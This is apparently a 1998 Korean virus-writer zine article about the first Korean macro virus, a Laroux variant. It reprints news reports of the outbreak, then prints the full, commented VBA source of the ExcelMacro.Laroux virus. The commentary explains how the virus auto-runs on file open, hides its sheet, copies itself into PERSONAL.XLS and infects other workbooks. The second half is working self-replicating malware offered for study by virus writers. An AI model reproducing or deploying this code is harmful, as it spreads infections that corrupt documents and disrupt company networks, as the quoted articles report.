
  한국산 최초의 매크로바이러스 출현                             CVC #04, 98/04

------------------------------------------------------------------> Red_Devils

  1998년 2월 한국산 최초의 매크로바이러스가 발견되었다. 이 바이러스는 라록스
바이러스의 변형으로 알려져 있다. 샘플을 구하지 못해서 분석을 못해 봤지만 라록
스의 변형이므로 아래와 유사한 코드일 것이다.

  아래는 안연구소의 바이러스정보와 기사화된 내용들이다.

 ------------------------------------------------------------------------------
 뉴스제공시각 : 03/11 19:50                   출처 : 동아일보
 제목 : [안진혁의 사이버월드]신종바이러스 「매크로」기승
 -----------------------------------------------------------------------------
    정보시대의 전염병 컴퓨터 바이러스. 가장 악명 높았던 바이러스를 꼽
  아보라면 단연 미켈란젤로 바이러스라고 할 수 있다.

    지난해까지만 해도 미켈란젤로의 생일인 3월6일이 오면 TV나 신문에는
  백신프로그램으로 컴퓨터를 검사해보라는 내용이 떠들썩하게 보도되곤 했
  다.

    그런 미켈란젤로 바이러스도 여섯살이 된 올해는 각종 신기술로 무장한
   첨단 바이러스의 맹렬한 활동에 눌려 찾아보기 어렵게 됐다.

    지난해 미국 컴퓨터보안협회가 발표한 바이러스 피해보고서를 살펴보면
   조사한 PC의 3.3%가 바이러스에 감염돼 있는 것으로 나타났다. 그런데
  이들 바이러스 중 80%는 매크로 바이러스인 것으로 드러났다.

    매크로 바이러스는 컴퓨터의 운영체제가 도스에서 윈도 95로 넘어가면
  서 확산된 바이러스다. 종전의 도스 바이러스와는 완전히 다른 감염체제
  를 갖고 있어 대비체제를 마련하지 않았던 이용자에게 큰 피해를 줬다.

    이 바이러스는 주로 마이크로소프트사의 워드나 엑셀 프로그램을 이용
  하는 사람에게 발생한다. 이 바이러스는 프로그램이 아닌 문서파일을 통
  해 감염되는 점이 특이하다. 문서파일을 손상시키는 탓에 어찌보면 일반
  프로그램의 손실보다 더 큰 피해를 불러일으킨다.

    지난해에는 인터넷의 전자우편을 통해 배달되는 매크로 바이러스가 유
  행해 세계적인 파문을 일으켰다.

    국내 바이러스 피해사례의 대부분도 기업에서 주로 사용하는 엑셀을 통
  한 매크로 바이러스다. 네트워크를 통해 문서를 주고 받는 사례가 늘어나
  면서 엑셀 매크로 바이러스는 갈수록 기승을 부리고 있다.

    이들 바이러스는 인터넷을 통해 국내에 유입된 게 대부분. 이에 따라
  최근에 나온 바이러스 백신은 인터넷 전자우편에서 받은 파일을 자동으로
   검사하는 기능을 제공하고 있다.

    마이크로소프트사 또한 ‘오피스’ 제품을 통한 바이러스 감염을 막기
  위해 치료 사이트(www.microsoft.com/msoffice/antivirus.asp)를 따로 열
  어놓고 있다. 컴퓨터 바이러스에 대해 궁금한 점이 있다면 ‘바이러스 학
  교(www.mcctv.com/virus)’를 이용하면 큰 도움이 될 것이다.

    <나우콤 C&C팀>


    ※ 이 기사는 인 터 넷 전 자 신 문(http://www.dongailbo.com/)에서도
       보실 수 있습니다.
 ------------------------------------------------------------------------------


 ------------------------------------------------------------------------------
 뉴스제공시각 : 03/26 17:37                   출처 : 전자신문
 제목 : 국산 매크로바이러스 "경보"
 -----------------------------------------------------------------------------
  안철수컴퓨터바이러스연구소(대표  안철수)는 마이크로소프트사 「MS엑셀」
프로그램의  문서파일에 감염되는 최초의 국산 매크로 바이러스인 「한국변형
라록스(ExcelMacro.Laroux.Kr)」  바이러스가 발견돼 피해기업이 확대되자 대
책마련이 시급하다고 경고했다.

  26일  안연구소바이러스신고센터는 매크로 바이러스 상담건수가 지난해 4월
부터  1년간 총1천3백98여건(이 중 워드매크로 2백77건, 액셀매크로 1천1백21
건)에  달하는 등 매크로 바이러스로 인한 피해사례가 최근 급증하고 있는 가
운데,  올 2월초 H사에서 처음 발견된 국산 매크로 바이러스인 「한국변형 라
록스」 바이러스가 모중공업의 서버에 감염돼 사내 네트워크 전체를 마비시키
는 등 기업에서 잇따라 피해사례가 접수되고 있다고 밝혔다.

  「MS엑셀」 프로그램의 문서파일에 감염되는 「한국변형 라록스」 바이러스
는  원형  「라록스(ExcelMacro.Laroux)」 바이러스의 일부가 변형된 것으로,
감염된 파일을 열면 『바이러스에 감염되었음. 매크로 바이러스를 잡아라』는
메시지가 출력되며 이 메시지는 감염된 파일의 오픈시각이 오전 10시, 오전 1
2시, 오후 3시, 오후 8시일 경우에 나타난다.

  특히 이 바이러스는 자체 버그로 인해 메시지 출력 도중 에러가 발생, 『런
타임 오류 「1004」:Worksheet 중 Paste방법에 오류가 있습니다』라는 내용의
창이  화면에 나타나며, 메시지가 문서에까지 포함되면서 일부 자료가 손상된
다.

  「한국변형  라록스」 바이러스 피해규모가 급증하는 이유에 대해 안연구소
측은 『대다수의 기업에서 MS엑셀 프로그램을 사용하고 있으며 네트워크 구축
이  보편화하면서 개인이 작성한 엑셀문서를 사내에서 공유하게 됨에 따라 순
식간에 확산됐기 때문』이라고 분석했다. H사의 경우에도 사내 게시판에 「한
국변형 라록스」 바이러스가 처음 발견된 이후 많은 문제를 일으킨 것으로 알
려졌다.

  안연구소는 또 『매크로 바이러스의 경우 변형 바이러스를 쉽게 양산해내는
특징을  가지고 있어 「한국변형 라록스」 바이러스의 등장은 앞으로 국산 매
크로  바이러스의  대량 양산을 예고했다는 점에서 주목해야 할 사건』이라고
강조했다.

  한편  안연구소는 국산 매크로 바이러스 폭증에 대비해 매크로 바이러스 전
담팀을 구성, 신속하게 대처키로 했으며 「V3Pro 97」에 「한국변형 라록스」
바이러스의 치료버전을 포함시켰다고 밝혔다. 문의 525-2141
  <김상범 기자>

  * 용어설명

  매크로  바이러스-이크로소프트사의 워드나 엑셀 프로그램의 매크로 기능을
이용해 제작된 바이러스로, 지금까지의 바이러스와 달리 문서파일을 감염시키
는 것이 특징이다. 워드매크로 바이러스와 엑셀매크로 바이러스로 나뉜다.

  워드매크로  바이러스-워드문서를 감염시키는 바이러스로 그동안 한글로 작
성된 문서를 감염시키지 않는 데다 국내에는 워드사용자가 적고, 한글판 워드
를 감염시키지 않아 피해 사례가 적었다.

  엑셀매크로  바이러스-엑셀문서를  감염시키는 바이러스로 대부분의 기업과
공공기관에서 엑셀 프로그램을 사용하고 있기 때문에 피해사례가 많았으며 한
글판을 감염시킨다. 현재도 피해사례가 계속 늘고 있다.

 ------------------------------------------------------------------------------
 뉴스제공시각 : 03/26 17:02                   출처 : 서울경제
 제목 :  '매크로 바이러스' 비상
 -----------------------------------------------------------------------------

마이크로소프트의 문서 작성용 SW인 [MS워드]나 도표 작성용
프로그램인 [엑셀] 사용자에게 컴퓨터 바이러스 비상령이 내렸다.

 안철수바이러스연구소(소장 안철수.안철수)는 최근 MS워드와
엑셀로 작성한 문서 파일만 집중적으로 감염시키는 이른바 [매크로
바이러스]의 한국 변형 바이러스 피해가 급증하고 있다고 26일
밝혔다.

 지난해 4월부터 현재까지 안철수연구소에 접수된 것만해도 워드
문서를 감염시키는 매크로 바이러스가 277건, 엑셀 문서를 감염시키는
매크로 바이러스가 1,121건이며 지난해말 이후 급속도로 확산되는
추세다.

 특히 엑셀은 기업이 사업 계획서나 회계 문서를 작성할 때 많이
쓰는 SW여서 감염될 경우 피해가 큰 것으로 알려졌다.

 실제로 지난 2월 발견된 [한국 변형 라록스] 바이러스는 한
대기업의 서버에 감염된 뒤 통신망을 타고 사무실 전체로 확산,
엑셀로 만든 사업계획서나 회계 문서를 엉망으로 만들었다는
것이다.

 이 바이러스에 감염되면 [바이러스에 감염되었음. 매크로 바이러스를
잡아라]나 [런 타임 오류 1004: Worksheet 중 Paste 방법에
오류가 있습니다]와 같은 메시지가 계속 나타나 문서 작성이
어렵게 된다.

 또 이미 작성된 문서가 바이러스의 메시지에 따라 변형되기도
한다.

 매크로 바이러스는 통신망을 타고 쉽게 확산되는데다 변형과
제작 방법도 간단해 양산 가능성이 높다는 점에서 큰 피해가
우려된다. 감염된 문서파일은 백신(V3Pro 97)으로 치료할 수
밖에 없다.

 이 바이러스는 워드나 엑셀의 기능 가운데 단순 반복적인 문서작성
작업을 쉽게 만들어 주는 단축키 기능(일명 매크로기능)에 편승해
복제되고 확산되기 때문에 매크로바이러스로 불린다.[이균성
기자]

 ------------------------------------------------------------------------------

 ExcelMacro.Laroux 소스 이다.


[ ExcelMacro. Laroux ]


->Polymorf        No
->Stealth         Yes
->Encrypted       No
->Retro           No

******************************************************************************

Laroux 는 첫 엑셀에서 작동하는 바이러스이다. 이 코드는 초보자들에게 꽤 이해하
기 쉬울 것이다. 아래의 소스를 보라.

******************************************************************************

Sub auto_open()
    Application.OnSheetActivate = "check_files"         ' 파일이 오픈되면
                                                        ' check_files 가 자동
                                                        ' 실행된다.
End Sub                                                 '

Sub check_files()                                       
    c$ = Application.StartupPath                        ' c$ = StartUp 경로
    m$ = Dir(c$ & "\" & "PERSONAL.XLS")                 '
    If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0        '
    If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
    whichfile = p + w * 10
    
Select Case whichfile
    Case 10
    Application.ScreenUpdating = False                  'ScreenUpdating Off
    n4$ = ActiveWorkbook.Name                           'n4$ = name of the
                                                        'active document.
    Sheets("laroux").Visible = True                     ' laroux 매크로를 선택
    Sheets("laroux").Select                             ' 하고 복사한다.
    Sheets("laroux").Copy                               '
        With ActiveWorkbook                               
        .Title = ""
        .Subject = ""
        .Author = ""
        .Keywords = ""
        .Comments = ""
    End With
    newname$ = ActiveWorkbook.Name                      ' 활동중인 파일의 이름을
                                                        ' 얻어낸다.
    c4$ = CurDir()                                      ' c4$=현재 경로
    ChDir Application.StartupPath                       ' startup 디렉토리로 이
                                                        ' 동한다.
    ActiveWindow.Visible = False
                                                        ' 활동중인 파일을 start
                                                        ' up 디렉토리로 이동한다
                                                        ' (with the
                                                        ' name personal.xls)
    Workbooks(newname$).SaveAs Filename:=Application.StartupPath & "/" _
        & "PERSONAL.XLS", FileFormat:=xlNormal _
        , Password:="", WriteResPassword:="", ReadOnlyRecommended:= _
        False, CreateBackup:=False
    ChDir c4$                                           'go back.
    Workbooks(n4$).Sheets("laroux").Visible = False     ' laroux sheet 를 보이
                                                        ' 지 않게한다.
    Application.OnSheetActivate = ""
    Application.ScreenUpdating = True                   'ScreenUpdating On
                                                        'and activate the
    Application.OnSheetActivate = "personal.xls!check_files" 'virus
    Case 1
    Application.ScreenUpdating = False                  'ScreenUpdating Off
    n4$ = ActiveWorkbook.Name                           ' n4$ = 활동 문서의 이
                                                        '       름
    p4$ = ActiveWorkbook.Path                           ' p4$ = 그것의 경로
    s$ = Workbooks(n4$).Sheets(1).Name                  ' s$ = 첫 시트의 이름
                                                        '
    If s$ <> "laroux" Then                              ' laroux 가 아니면 그
                                                        ' 파일을 감염시킨다.
        Workbooks("PERSONAL.XLS").Sheets("laroux").Copy before:=Workbooks(n4$).Sheets(1)
        Workbooks(n4$).Sheets("laroux").Visible = False
    Else                                                
    End If
    Application.OnSheetActivate = ""                    
    Application.ScreenUpdating = True                   'ScreenUpdating On
                                                        'and activate the
    Application.OnSheetActivate = "personal.xls!check_files" 'virus
    Case Else
End Select
End Sub                                                 'end.

******************************************************************************

  분석해준 SLAM 의 Nightmare Joker 에게 감사드린다.

  VBA (Visual Basic for Application) 를 사용한 최초의 엑셀 매크로 바이러스로
알려져 있다.

 * auto_open ()

  해당 파일이 오픈 되면 자동으로 실행되는 매크로이다. PERSONAL.XLS 에 Laroux
바이러스가 감염되어 있지 않다면 오픈과 동시에 자동 실행된다. 감염된 경우에는
파일이 오픈될 때 마다 자동 실행된다. check_files 만 호출 할 뿐이다.

 * check_files ()

    10 의 경우 : 바이러스 매크로를 personal.xls 에 복사를 한다.

    1 의 경우  : 엑셀이 이미 라록스에 감염되어 있는 상태이다.


